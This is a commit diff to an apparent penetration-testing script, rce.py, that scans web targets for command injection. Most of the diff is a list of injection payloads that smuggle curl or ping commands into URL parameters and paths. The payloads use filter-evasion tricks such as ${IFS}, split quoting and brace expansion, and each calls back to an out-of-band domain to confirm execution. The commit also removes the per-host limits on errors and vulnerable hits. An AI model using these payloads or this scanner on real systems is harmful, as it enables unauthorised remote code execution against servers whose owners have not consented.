STRLCPY/pentest-tools

rce
Gwen committed 2 years ago

aef8b0ef

1 parent fbcb7ea8

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

rce.py

		skipped 17 lines
18	18		from multiprocessing.dummy import Pool
19	19		from colored import fg, bg, attr
20	20
21		-	MAX_EXCEPTION = 3
22		-	MAX_VULNERABLE = 3
	21	+	MAX_EXCEPTION = 100
	22	+	MAX_VULNERABLE = 100
23	23
24	24		# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
25	25		from requests.packages.urllib3.exceptions import InsecureRequestWarning
		skipped 93 lines
119	119		if len(t_urlparse.query):
120	120		testParams( t_urlparse, payload.strip('/') )
121	121
122		-	if len(t_urlparse.fragment):
123		-	testFragment( t_urlparse, payload.strip('/') )
	122	+	# if len(t_urlparse.fragment):
	123	+	# testFragment( t_urlparse, payload.strip('/') )
124	124
125	125		testPath( t_urlparse, payload )
126	126
		skipped 13 lines
140	140
141	141		def doTest( url, method='GET', post_params='' ):
142	142
143		-	t_realdotest.append( [url,method,post_params] )
	143	+	realDoTest( [url,method,post_params] )
	144	+	# t_realdotest.append( [url,method,post_params] )
144	145		return
145	146
146	147
		skipped 10 lines
157	158		t_urlparse = urllib.parse.urlparse(url)
158	159		u = t_urlparse.scheme + '_' + t_urlparse.netloc
159	160
160		-	if not u in t_exceptions:
161		-	t_exceptions[u] = 0
162		-	if t_exceptions[u] >= MAX_EXCEPTION:
163		-	if _verbose >= 3 and _verbose < 4:
164		-	print("skip too many exceptions %s" % t_urlparse.netloc)
165		-	return
	161	+	# if not u in t_exceptions:
	162	+	# t_exceptions[u] = 0
	163	+	# if t_exceptions[u] >= MAX_EXCEPTION:
	164	+	# if _verbose >= 3 and _verbose < 4:
	165	+	# print("skip too many exceptions %s" % t_urlparse.netloc)
	166	+	# return
166	167
167		-	if not u in t_vulnerable:
168		-	t_vulnerable[u] = 0
169		-	if t_vulnerable[u] >= MAX_VULNERABLE:
170		-	if _verbose >= 3 and _verbose < 4:
171		-	print("skip already vulnerable %s" % t_urlparse.netloc)
172		-	return
	168	+	# if not u in t_vulnerable:
	169	+	# t_vulnerable[u] = 0
	170	+	# if t_vulnerable[u] >= MAX_VULNERABLE:
	171	+	# if _verbose >= 3 and _verbose < 4:
	172	+	# print("skip already vulnerable %s" % t_urlparse.netloc)
	173	+	# return
173	174
174	175		try:
175	176		if method == 'POST':
		skipped 1 lines
177	178		else:
178	179		r = requests.head( url, headers=t_custom_headers, timeout=5, verify=False )
179	180		except Exception as e:
180		-	t_exceptions[u] = t_exceptions[u] + 1
	181	+	# t_exceptions[u] = t_exceptions[u] + 1
181	182		if _verbose >= 3 and _verbose < 4:
182	183		sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
183	184		return
		skipped 137 lines
321	322
322	323		if not n_payloads:
323	324		t_payloads = [
324		-	'%0Acurl%20rce___RANDOM_STR__.__DOMAIN__',
325		-	'%0Acurl%20rce___RANDOM_STR__.__DOMAIN__',
326		-	'%0a%20curl%20rce___RANDOM_STR__.__DOMAIN__%20%0a',
327		-	'%0Acurl%20rce___RANDOM_STR__.__DOMAIN__%0A',
328		-	'\|curl%20rce___RANDOM_STR__.__DOMAIN__',
329		-	';curl%20rce___RANDOM_STR__.__DOMAIN__',
330		-	';curl%20rce___RANDOM_STR__.__DOMAIN__\|',
331		-	';curl%20rce___RANDOM_STR__.__DOMAIN__;',
332		-	';curl$IFSrce___RANDOM_STR__.__DOMAIN__;',
333		-	')\|curl%20rce___RANDOM_STR__.__DOMAIN__',
334		-	')\|curl%20rce___RANDOM_STR__.__DOMAIN__;',
335		-	');curl%20rce___RANDOM_STR__.__DOMAIN__',
336		-	');curl%20rce___RANDOM_STR__.__DOMAIN__\|',
337		-	');curl%20rce___RANDOM_STR__.__DOMAIN__;',
338		-	'`curl%20rce___RANDOM_STR__.__DOMAIN__`',
339		-	'\|\|curl%20rce___RANDOM_STR__.__DOMAIN__\|',
340		-	'\|\|curl%20rce___RANDOM_STR__.__DOMAIN__;',
341		-	'\|\|curl$IFSrce___RANDOM_STR__.__DOMAIN__;',
342		-	'\|%20curl%20rce___RANDOM_STR__.__DOMAIN__',
343		-	'\|curl%20rce___RANDOM_STR__.__DOMAIN__',
344		-	'\|curl%20rce___RANDOM_STR__.__DOMAIN__\|',
345		-	'\|curl%20rce___RANDOM_STR__.__DOMAIN__;',
346		-	';\|curl%20rce___RANDOM_STR__.__DOMAIN__\|',
347		-	';%20curl%20rce___RANDOM_STR__.__DOMAIN__',
348		-	';curl%20rce___RANDOM_STR__.__DOMAIN__',
349		-	';curl%20rce___RANDOM_STR__.__DOMAIN__\|',
350		-	';curl%20rce___RANDOM_STR__.__DOMAIN__;',
351		-	'$;curl%20rce___RANDOM_STR__.__DOMAIN__',
352		-	'$(curl%20rce___RANDOM_STR__.__DOMAIN__)',
353		-	'&%20curl%20rce___RANDOM_STR__.__DOMAIN__',
354		-	'%26%20curl%20rce___RANDOM_STR__.__DOMAIN__%20%26',
355		-	';curl%20rce___RANDOM_STR__.__DOMAIN__\n',
356		-	'\ncurl%20rce___RANDOM_STR__.__DOMAIN__\|',
357		-	'\ncurl%20rce___RANDOM_STR__.__DOMAIN__;',
358		-	'\|ncurl%20rce___RANDOM_STR__.__DOMAIN__\n',
359		-	'\ncurl%20rce___RANDOM_STR__.__DOMAIN__\n',
360		-	';system(\'curl%20rce___RANDOM_STR__.__DOMAIN__\')',
361		-	';exec(\'curl%20rce___RANDOM_STR__.__DOMAIN__\')',
362		-	'\|curl%20rce___RANDOM_STR__.__DOMAIN__\n',
363		-	'`curl%20rce___RANDOM_STR__.__DOMAIN__`',
364		-	'%0acurl%20rce___RANDOM_STR__.__DOMAIN__%0a',
	325	+	'rce___RANDOM_STR__.__DOMAIN__',
	326	+	'$;ping%20rce___RANDOM_STR__.__DOMAIN__',
	327	+	'%0Aping%20rce___RANDOM_STR__.__DOMAIN__%0A',
	328	+	'%0Aping%20rce___RANDOM_STR__.__DOMAIN__',
	329	+	'%0a%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%0a',
	330	+	'%0aping%20rce___RANDOM_STR__.__DOMAIN__%0a',
	331	+	'%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26',
	332	+	'%26%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26%26',
	333	+	'&%20ping%20rce___RANDOM_STR__.__DOMAIN__',
	334	+	');ping${IFS}rce___RANDOM_STR__.__DOMAIN__',
	335	+	');ping<rce___RANDOM_STR__.__DOMAIN__',
	336	+	");p'i'n'g'${IFS}rce___RANDOM_STR__.__DOMAIN__%23",
	337	+	');p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__%23',
	338	+	');{p\i\n\g,rce___RANDOM_STR__.__DOMAIN__}%23',
	339	+	');{ping,rce___RANDOM_STR__.__DOMAIN__}',
	340	+	');ping%20rce___RANDOM_STR__.__DOMAIN__',
	341	+	');ping%20rce___RANDOM_STR__.__DOMAIN__;',
	342	+	');ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	343	+	')\|ping%20rce___RANDOM_STR__.__DOMAIN__',
	344	+	')\|ping%20rce___RANDOM_STR__.__DOMAIN__;',
	345	+	';{ping;rce___RANDOM_STR__.__DOMAIN__}',
	346	+	';exec(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')',
	347	+	';ping${IFS}rce___RANDOM_STR__.__DOMAIN__;',
	348	+	';ping<rce___RANDOM_STR__.__DOMAIN__;',
	349	+	';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;',
	350	+	';{ping,rce___RANDOM_STR__.__DOMAIN__};',
	351	+	';ping%20rce___RANDOM_STR__.__DOMAIN__',
	352	+	';ping%20rce___RANDOM_STR__.__DOMAIN__;',
	353	+	";p'i'n'g%20rce___RANDOM_STR__.__DOMAIN__;",
	354	+	';p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__;',
	355	+	';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;',
	356	+	';p$@in$@g%20rce___RANDOM_STR__.__DOMAIN__;',
	357	+	';p$()in$()g%20rce___RANDOM_STR__.__DOMAIN__;',
	358	+	';ping%20rce___RANDOM_STR__.__DOMAIN__\n',
	359	+	';ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	360	+	';system(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')',
	361	+	';\|ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	362	+	'\nping%20rce___RANDOM_STR__.__DOMAIN__;',
	363	+	'\nping%20rce___RANDOM_STR__.__DOMAIN__\n',
	364	+	'\nping%20rce___RANDOM_STR__.__DOMAIN__\|',
	365	+	'`ping%20rce___RANDOM_STR__.__DOMAIN__`',
	366	+	'\|%20ping%20rce___RANDOM_STR__.__DOMAIN__',
	367	+	'\|\nping%20rce___RANDOM_STR__.__DOMAIN__\n',
	368	+	'\|ping%20rce___RANDOM_STR__.__DOMAIN__',
	369	+	'\|ping${IFS}rce___RANDOM_STR__.__DOMAIN__;',
	370	+	'\|ping<rce___RANDOM_STR__.__DOMAIN__;',
	371	+	'\|{ping,rce___RANDOM_STR__.__DOMAIN__};',
	372	+	'\|ping%20rce___RANDOM_STR__.__DOMAIN__;',
	373	+	'\|ping%20rce___RANDOM_STR__.__DOMAIN__\n',
	374	+	'\|ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	375	+	'\|\|ping$IFSrce___RANDOM_STR__.__DOMAIN__;',
	376	+	'\|\|ping<rce___RANDOM_STR__.__DOMAIN__;',
	377	+	'\|\|{ping,rce___RANDOM_STR__.__DOMAIN__};',
	378	+	'\|\|ping%20rce___RANDOM_STR__.__DOMAIN__;',
	379	+	'\|\|ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	380	+	"\|\|p'i'n'g%20rce___RANDOM_STR__.__DOMAIN__%23",
	381	+	'\|\|p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__%23',
	382	+	'\|\|p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__%23',
	383	+	'\|\|p$@in$@g%20rce___RANDOM_STR__.__DOMAIN__%23',
	384	+	'\|\|p$()in$()g%20rce___RANDOM_STR__.__DOMAIN__%23',
	385	+
	386	+	# '%0Aping%20rce___RANDOM_STR__.__DOMAIN__',
	387	+	# '%0Aping%20rce___RANDOM_STR__.__DOMAIN__',
	388	+	# '%0a%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%0a',
	389	+	# '%0Aping%20rce___RANDOM_STR__.__DOMAIN__%0A',
	390	+	# '\|ping%20rce___RANDOM_STR__.__DOMAIN__',
	391	+	# ';ping%20rce___RANDOM_STR__.__DOMAIN__',
	392	+	# ';ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	393	+	# ';ping%20rce___RANDOM_STR__.__DOMAIN__;',
	394	+	# ';ping$IFSrce___RANDOM_STR__.__DOMAIN__;',
	395	+	# ')\|ping%20rce___RANDOM_STR__.__DOMAIN__',
	396	+	# ')\|ping%20rce___RANDOM_STR__.__DOMAIN__;',
	397	+	# ');ping%20rce___RANDOM_STR__.__DOMAIN__',
	398	+	# ');ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	399	+	# ');ping%20rce___RANDOM_STR__.__DOMAIN__;',
	400	+	# '`ping%20rce___RANDOM_STR__.__DOMAIN__`',
	401	+	# '\|\|ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	402	+	# '\|\|ping%20rce___RANDOM_STR__.__DOMAIN__;',
	403	+	# '\|\|ping$IFSrce___RANDOM_STR__.__DOMAIN__;',
	404	+	# '\|%20ping%20rce___RANDOM_STR__.__DOMAIN__',
	405	+	# '\|ping%20rce___RANDOM_STR__.__DOMAIN__',
	406	+	# '\|ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	407	+	# '\|ping%20rce___RANDOM_STR__.__DOMAIN__;',
	408	+	# ';\|ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	409	+	# ';%20ping%20rce___RANDOM_STR__.__DOMAIN__',
	410	+	# ';ping%20rce___RANDOM_STR__.__DOMAIN__',
	411	+	# ';ping%20rce___RANDOM_STR__.__DOMAIN__\|',
	412	+	# ';ping%20rce___RANDOM_STR__.__DOMAIN__;',
	413	+	# '$;ping%20rce___RANDOM_STR__.__DOMAIN__',
	414	+	# '$(ping%20rce___RANDOM_STR__.__DOMAIN__)',
	415	+	# '&%20ping%20rce___RANDOM_STR__.__DOMAIN__',
	416	+	# '%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26',
	417	+	# '%26%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26%26',
	418	+	# ';ping%20rce___RANDOM_STR__.__DOMAIN__\n',
	419	+	# '\nping%20rce___RANDOM_STR__.__DOMAIN__\|',
	420	+	# '\nping%20rce___RANDOM_STR__.__DOMAIN__;',
	421	+	# '\|nping%20rce___RANDOM_STR__.__DOMAIN__\n',
	422	+	# '\nping%20rce___RANDOM_STR__.__DOMAIN__\n',
	423	+	# ';system(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')',
	424	+	# ';exec(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')',
	425	+	# '\|ping%20rce___RANDOM_STR__.__DOMAIN__\n',
	426	+	# '`ping%20rce___RANDOM_STR__.__DOMAIN__`',
	427	+	# '%0aping%20rce___RANDOM_STR__.__DOMAIN__%0a',
365	428		]
366	429
367	430		for i,payload in enumerate(t_payloads):
		skipped 42 lines
410	473		sys.stdout.write( '[+] testing...\n' )
411	474
412	475
413		-	random.shuffle(t_totest)
	476	+	# random.shuffle(t_totest)
414	477		# print("\n".join(t_totest))
415	478		# exit()
416	479
		skipped 31 lines
448	511
449	512
450	513
451		-	t_exceptions = {}
452		-	t_vulnerable = {}
453		-	t_multiproc = {
454		-	'n_current': 0,
455		-	'n_total': len(t_realdotest),
456		-	'u_max_length': u_max_length+5,
457		-	'd_output': d_output,
458		-	'f_output': f_output,
459		-	}
	514	+	# t_exceptions = {}
	515	+	# t_vulnerable = {}
	516	+	# t_multiproc = {
	517	+	# 'n_current': 0,
	518	+	# 'n_total': len(t_realdotest),
	519	+	# 'u_max_length': u_max_length+5,
	520	+	# 'd_output': d_output,
	521	+	# 'f_output': f_output,
	522	+	# }
460	523
461		-	def realDoWork():
462		-	while True:
463		-	params = q.get()
464		-	realDoTest( params )
465		-	q.task_done()
	524	+	# def realDoWork():
	525	+	# while True:
	526	+	# params = q.get()
	527	+	# realDoTest( params )
	528	+	# q.task_done()
466	529
467		-	q = Queue( _threads*2 )
	530	+	# q = Queue( _threads*2 )
468	531
469		-	for i in range(_threads):
470		-	t = Thread( target=realDoWork )
471		-	t.daemon = True
472		-	t.start()
	532	+	# for i in range(_threads):
	533	+	# t = Thread( target=realDoWork )
	534	+	# t.daemon = True
	535	+	# t.start()
473	536
474		-	try:
475		-	for url in t_realdotest:
476		-	q.put( url )
477		-	q.join()
478		-	except KeyboardInterrupt:
479		-	sys.exit(1)
	537	+	# try:
	538	+	# for url in t_realdotest:
	539	+	# q.put( url )
	540	+	# q.join()
	541	+	# except KeyboardInterrupt:
	542	+	# sys.exit(1)
480	543
481	544
482	545
		skipped 1 lines